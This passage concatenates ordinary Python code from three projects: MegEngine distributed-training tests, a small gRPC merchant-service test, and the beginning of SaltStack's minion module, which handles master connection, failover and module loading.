platform.system() == "Windows", reason="do not imp GPU mode at Windows now"
)
@pytest.mark.skipif(get_device_count_by_fork("gpu") < 2, reason="need more gpu device")
@pytest.mark.isolated_distributed
def test_init_process_group():
world_size = 2
port = dist.get_free_ports(1)[0]
server = dist.Server(port)
def worker(rank, backend):
dist.init_process_group("localhost", port, world_size, rank, rank, backend)
assert dist.is_distributed() == True
assert dist.get_rank() == rank
assert dist.get_world_size() == world_size
assert dist.get_backend() == backend
py_server_addr = dist.get_py_server_addr()
assert py_server_addr[0] == "localhost"
assert py_server_addr[1] == port
mm_server_addr = dist.get_mm_server_addr()
assert mm_server_addr[0] == "localhost"
assert mm_server_addr[1] > 0
assert isinstance(dist.get_client(), dist.Client)
def check(backend):
procs = []
for rank in range(world_size):
p = mp.Process(target=worker, args=(rank, backend))
p.start()
procs.append(p)
for p in procs:
p.join(20)
assert p.exitcode == 0
check("nccl")
@pytest.mark.skipif(
platform.system() == "Darwin", reason="do not imp GPU mode at macos now"
)
@pytest.mark.skipif(
platform.system() == "Windows", reason="do not imp GPU mode at Windows now"
)
@pytest.mark.skipif(get_device_count_by_fork("gpu") < 2, reason="need more gpu device")
@pytest.mark.isolated_distributed
def test_new_group():
world_size = 3
ranks = [2, 0]
port = dist.get_free_ports(1)[0]
server = dist.Server(port)
def worker(rank):
dist.init_process_group("localhost", port, world_size, rank, rank)
if rank in ranks:
group = dist.new_group(ranks)
assert group.size == 2
assert group.key == "2,0"
assert group.rank == ranks.index(rank)
assert group.comp_node == "gpu{}:2".format(rank)
procs = []
for rank in range(world_size):
p = mp.Process(target=worker, args=(rank,))
p.start()
procs.append(p)
for p in procs:
p.join(20)
assert p.exitcode == 0
@pytest.mark.skipif(
platform.system() == "Darwin", reason="do not imp GPU mode at macos now"
)
@pytest.mark.skipif(
platform.system() == "Windows", reason="do not imp GPU mode at Windows now"
)
@pytest.mark.skipif(get_device_count_by_fork("gpu") < 2, reason="need more gpu device")
@pytest.mark.isolated_distributed
def test_group_barrier():
world_size = 2
port = dist.get_free_ports(1)[0]
server = dist.Server(port)
def worker(rank, q):
dist.init_process_group("localhost", port, world_size, rank, rank)
dist.group_barrier()
if rank == 0:
dist.group_barrier()
q.put(0) # to be observed in rank 1
else:
_assert_q_empty(q) # q.put(0) is not executed in rank 0
dist.group_barrier()
_assert_q_val(q, 0) # q.put(0) executed in rank 0
Q = mp.Queue()
procs = []
for rank in range(world_size):
p = mp.Process(target=worker, args=(rank, Q))
p.start()
procs.append(p)
for p in procs:
p.join(20)
assert p.exitcode == 0
@pytest.mark.skipif(
platform.system() == "Darwin", reason="do not imp GPU mode at macos now"
)
@pytest.mark.skipif(
platform.system() == "Windows", reason="do not imp GPU mode at Windows now"
)
@pytest.mark.skipif(get_device_count_by_fork("gpu") < 2, reason="need more gpu device")
@pytest.mark.isolated_distributed
def test_synchronized():
world_size = 2
port = dist.get_free_ports(1)[0]
server = dist.Server(port)
@dist.synchronized
def func(rank, q):
q.put(rank)
def worker(rank, q):
dist.init_process_group("localhost", port, world_size, rank, rank)
dist.group_barrier()
if rank == 0:
func(0, q) # q.put(0)
q.put(2)
else:
_assert_q_val(q, 0) # func executed in rank 0
_assert_q_empty(q) # q.put(2) is not executed
func(1, q)
_assert_q_val(
q, 1
) # func in rank 1 executed earlier than q.put(2) in rank 0
_assert_q_val(q, 2) # q.put(2) executed in rank 0
Q = mp.Queue()
procs = []
for rank in range(world_size):
p = mp.Process(target=worker, args=(rank, Q))
p.start()
procs.append(p)
for p in procs:
p.join(20)
assert p.exitcode == 0
def test_oprmm_hashable():
lhs = (CollectiveComm(), ParamPackConcat(), ParamPackSplit())
rhs = (CollectiveComm(), ParamPackConcat(), ParamPackSplit())
assert lhs == rhs
assert hash(lhs) == hash(rhs)
def test_param_pack_split():
a = mge.Tensor(np.ones((10,), np.int32))
b, c = param_pack_split(a, [0, 1, 1, 10], [(1,), (3, 3)])
assert np.allclose(b.numpy(), a.numpy()[1])
assert np.allclose(c.numpy(), a.numpy()[1:].reshape(3, 3))
def test_param_pack_concat():
a = mge.Tensor(np.ones((1,), np.int32))
b = mge.Tensor(np.ones((3, 3), np.int32))
offsets_val = [0, 1, 1, 10]
offsets = mge.Tensor(offsets_val, np.int32)
c = param_pack_concat([a, b], offsets, offsets_val)
assert np.allclose(np.concatenate([a.numpy(), b.numpy().flatten()]), c.numpy())
|
test_merchant.py
|
import pytest
import grpc
import threading
from stub.test_pb2 import EchoRequest, Empty
from merchant_stub.data_pb2 import UpdateSupplierReq
@pytest.fixture(scope='module')
def grpc_add_to_server():
from merchant_stub.merchant_service_pb2_grpc import add_MerchantServiceServicer_to_server
return add_MerchantServiceServicer_to_server
@pytest.fixture(scope='module')
def grpc_servicer():
from merchant_servicer import Servicer
return Servicer()
@pytest.fixture(scope='module')
def grpc_stub(grpc_channel):
from merchant_stub.merchant_service_pb2_grpc import MerchantServiceStub
return MerchantServiceStub(grpc.insecure_channel("10.1.152.116:9006"))
def test_some(grpc_stub):
request = UpdateSupplierReq(country='VN',name='pytest')
response = grpc_stub.UpsertSupplier(request)
assert response.name == f'test-{request.name}'
def test_example(grpc_stub):
request = EchoRequest()
response = grpc_stub.error_handler(request)
print("1111")
assert response.name == f'test-{request.name}'
grpc_max_workers = 2
def test_blocking(grpc_stub):
stream = grpc_stub.blocking(Empty())
# after this call the servicer blocks its thread
def call_unblock():
# with grpc_max_workers = 1 this call could not be executed
grpc_stub.unblock(Empty())
grpc_stub.unblock(Empty())
t = threading.Thread(target=call_unblock)
t.start()
for resp in stream:
pass
t.join()
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function
import os
import re
import sys
import copy
import time
import types
import signal
import fnmatch
import logging
import threading
import traceback
import multiprocessing
from random import shuffle
from stat import S_IMODE
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
import salt.ext.six as six
if six.PY3:
import ipaddress
else:
import salt.ext.ipaddress as ipaddress
from salt.ext.six.moves import range
# pylint: enable=no-name-in-module,redefined-builtin
# Import third party libs
try:
import zmq
# TODO: cleanup
import zmq.eventloop.ioloop
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
HAS_ZMQ = True
except ImportError:
# Running in local, zmq not needed
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.payload
import salt.syspaths
import salt.utils
import salt.utils.jid
import salt.pillar
import salt.utils.args
import salt.utils.event
import salt.utils.minions
import salt.utils.schedule
import salt.utils.error
import salt.utils.zeromq
import salt.defaults.exitcodes
import salt.cli.daemons
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
if check_dns is True:
# Because I import salt.log below I need to re-import salt.utils here
import salt.utils
try:
if opts['master'] == '':
raise SaltSystemExit
ret['master_ip'] = \
salt.utils.dns_check(opts['master'], True, opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found. Retrying in {1} '
'seconds').format(opts['master'], opts['retry_dns'])
if salt.log.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.dns_check(
opts['master'], True, opts['ipv6']
)
break
except SaltClientError:
pass
else:
ret['master_ip'] = '127.0.0.1'
except SaltSystemExit:
unknown_str = 'unknown address'
master = opts.get('master', unknown_str)
if master == '':
master = unknown_str
if opts.get('__role') == 'syndic':
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. Set \'syndic_master\' value in minion config.'.format(master)
else:
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. Set \'master\' value in minion config.'.format(master)
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
ret['master_ip'])
)
ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
port=opts['master_port'])
return ret
def prep_ip_port(opts):
ret = {}
if opts['master_uri_format'] == 'ip_only':
ret['master'] = opts['master']
else:
ip_port = opts['master'].rsplit(":", 1)
if len(ip_port) == 1:
# e.g. master: mysaltmaster
ret['master'] = ip_port[0]
else:
# e.g. master: localhost:1234
# e.g. master: 127.0.0.1:1234
# e.g. master: ::1:1234
ret['master'] = ip_port[0]
ret['master_port'] = ip_port[1]
return ret
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
mode: which is anything os.makedir would accept as mode.
uid: the uid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
uid. Must be int. Works only on unix/unix like systems.
gid: the gid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
gid. Must be int. Works only on unix/unix like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So lets check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
def parse_args_and_kwargs(func, args, data=None):
'''
Wrap load_args_and_kwargs
'''
salt.utils.warn_until(
'Boron',
'salt.minion.parse_args_and_kwargs() has been renamed to '
'salt.minion.load_args_and_kwargs(). Please change this function call '
'before the Boron release of Salt.'
)
return load_args_and_kwargs(func, args, data=data)
def load_args_and_kwargs(func, args, data=None, ignore_invalid=False):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, six.string_types):
string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632
if string_arg:
# Don't append the version that was just derived from parse_cli
# above, that would result in a 2nd call to
# salt.utils.cli.yamlify_arg(), which could mangle the input.
_args.append(arg)
elif string_kwarg:
salt.utils.warn_until(
'Boron',
'The list of function args and kwargs should be parsed '
'by salt.utils.args.parse_input() before calling '
'salt.minion.load_args_and_kwargs().'
)
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
# if the arg is a dict with __kwarg__ == True, then its a kwarg
elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
_args.append(arg)
if invalid_kwargs and not ignore_invalid:
salt.utils.invalid_kwargs(invalid_kwargs)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
minion.schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons')
if b_conf:
return self.beacons.process(b_conf)
return []
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
returned. If this function is called outside the minions initialization
phase (for example from the minions main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# check if master_type was altered from its default
if opts['master_type'] != 'str' and opts['__role'] != 'syndic':
# check for a valid keyword
if opts['master_type'] == 'func':
# split module and function and try loading the module
mod, fun = opts['master'].split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise TypeError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod + '.' + fun]()
except TypeError:
msg = ('Failed to evaluate master address from '
'module \'{0}\''.format(opts['master']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: {0}'.format(master_mod))
# if failover is set, master has to be of type list
elif opts['master_type'] == 'failover':
if isinstance(opts['master'], list):
log.info('Got list of available master addresses:'
' {0}'.format(opts['master']))
if opts['master_shuffle']:
shuffle(opts['master'])
# if opts['master'] is a str and we have never created opts['master_list']
elif isinstance(opts['master'], str) and ('master_list' not in opts):
# We have a string, but a list was what was intended. Convert.
# See issue 23611 for details
opts['master'] = [opts['master']]
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master']))
# if failed=True, the minion was previously connected
# we're probably called from the minions main-event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
log.info('Removing possibly failed master {0} from list of'
' masters'.format(opts['master']))
# create new list of master with the possibly failed one removed
opts['master'] = [x for x in opts['master_list'] if opts['master'] != x]
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# If failover is set, minion have to failover on DNS errors instead of retry DNS resolve.
# See issue 21082 for details
if opts['retry_dns']:
msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. '
'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.')
log.critical(msg)
opts['retry_dns'] = 0
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop
# (The channel factories will set a default if the kwarg isn't passed)
factory_kwargs = {'timeout': timeout, 'safe': safe}
if getattr(self, 'io_loop', None):
factory_kwargs['io_loop'] = self.io_loop
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
# shuffle the masters and then loop through them
local_masters = copy.copy(opts['master'])
for master in local_masters:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
self.opts = opts
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = local_masters
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs)
yield pub_channel.connect()
conn = True
break
except SaltClientError:
msg = ('Master {0} could not be reached, trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
if not conn:
self.connected = False
msg = ('No master could be reached or all masters denied '
'the minions connection attempt.')
log.error(msg)
else:
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
class SMinion(MinionBase):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
opts['grains'] = salt.loader.grains(opts)
super(SMinion, self).__init__(opts)
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
self.eval_master(self.opts, failed=True)
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils,
include_errors=True)
self.proxy = salt.loader.proxy(self.opts, None)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.returners = salt.loader.returners(self.opts, self.functions)
self.states = salt.loader.states(self.opts, self.functions, self.utils)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts)
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None):
self.opts = salt.config.minion_config(opts['conf_file'])
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts,
self.functions,
self.utils)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MultiMinion(MinionBase):
'''
Create a multi minion interface, this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
# timeout for one of the minions to auth with a master
MINION_CONNECT_TIMEOUT = 5
def __init__(self, opts):
super(MultiMinion, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
def _spawn_minions(self):
'''
Spawn all the coroutines which will sign in to masters
'''
if not isinstance(self.opts['master'], list):
log.error(
'Attempting to start a multimaster system with one master')
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
for master in set(self.opts['master']):
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
s_opts['auth_timeout'] = self.MINION_CONNECT_TIMEOUT
self.io_loop.spawn_callback(self._connect_minion, s_opts)
@tornado.gen.coroutine
def _connect_minion(self, opts):
'''
Create a minion, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
try:
minion = Minion(opts,
self.MINION_CONNECT_TIMEOUT,
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(opts['master']),
)
yield minion.connect_master()
minion.tune_in(start=False)
break
except SaltClientError as exc:
log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except Exception as e:
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
# Fire off all the minion coroutines
self.minions = self._spawn_minions()
# serve forever!
self.io_loop.start()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
self.io_loop = io_loop or zmq.eventloop.ioloop.ZMQIOLoop()
if not self.io_loop.initialized():
self.io_loop.install()
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')]
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup the of the opts grains, so we can log from the grains
# module
if 'proxyid' not in self.opts:
self.opts['grains'] = salt.loader.grains(opts)
# TODO: remove?
def sync_connect_master(self):
'''
Block until we are connected to a master
'''
log.debug("sync_connect_master")
self._connect_master_future = self.connect_master()
# finish connecting to master
self._connect_master_future.add_done_callback(lambda f: self.io_loop.stop())
self.io_loop.start()
# I made the following 3 line oddity to preserve traceback.
# Please read PR #23978 before changing, hopefully avoiding regressions.
# Good luck, we're all counting on you. Thanks.
future_exception = self._connect_master_future.exc_info()
if future_exception:
raise six.reraise(*future_exception)
@tornado.gen.coroutine
def connect_master(self):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe)
yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
'''
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv')
).compile_pillar()
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minions scheduler
if 'mine.update' in self.functions:
log.info('Added mine.update to scheduler')
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2
}
}, persist=True)
# add master_alive job if enabled
if self.opts['master_alive_interval'] > 0:
self.schedule.add_job({
'__master_alive':
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
self.grains_cache = self.opts['grains']
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _process_beacons(self):
'''
Process each beacon and send events if appropriate
'''
# Process Beacons
try:
beacons = self.process_beacons(self.functions)
except Exception as exc:
log.critical('Beacon processing failed: {0}. No beacons will be processed.'.format(traceback.format_exc(exc)))
beacons = None
if beacons:
self._fire_master(events=beacons)
for beacon in beacons:
serialized_data = salt.utils.dicttrim.trim_dict(
self.serial.dumps(beacon['data']),
self.opts.get('max_event_size', 1048576),
is_msgpacked=True,
)
log.debug('Sending event - data = {0}'.format(beacon['data']))
event = '{0}{1}{2}'.format(
beacon['tag'],
salt.utils.event.TAGEND,
serialized_data,
)
self.event_publisher.handle_publish([event])
def _load_modules(self, force_refresh=False, notify=False):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).memory_info()
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh)
self.utils = salt.loader.utils(self.opts)
if self.opts.get('multimaster', False):
s_opts = copy.deepcopy(self.opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify)
returners = salt.loader.returners(self.opts, functions)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
executors = salt.loader.executors(self.opts)
return functions, returners, errors, executors
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
channel = salt.transport.Channel.factory(self.opts)
try:
result = channel.send(load, timeout=timeout)
return True
except Exception:
log.info('fire_master failed: {0}'.format(traceback.format_exc()))
return False
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
if 'user' in data:
log.info(
'User {0[user]} Executing command {0[fun]} with jid '
'{0[jid]}'.format(data)
)
else:
log.info(
'Executing command {0[fun]} with jid {0[jid]}'.format(data)
)
log.debug('Command details {0}'.format(data))
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
target = Minion._thread_multi_return
else:
target = Minion._thread_return
# We stash an instance references to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
if self.opts['multiprocessing']:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
process = multiprocessing.Process(
target=target, args=(instance, self.opts, data)
)
else:
process = threading.Thread(
target=target,
args=(instance, self.opts, data),
name=data['jid']
)
process.start()
if not sys.platform.startswith('win'):
process.join()
else:
self.win_proc.append(process)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
if not hasattr(minion_instance, 'functions'):
functions, returners, function_errors, executors = (
minion_instance._load_modules()
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
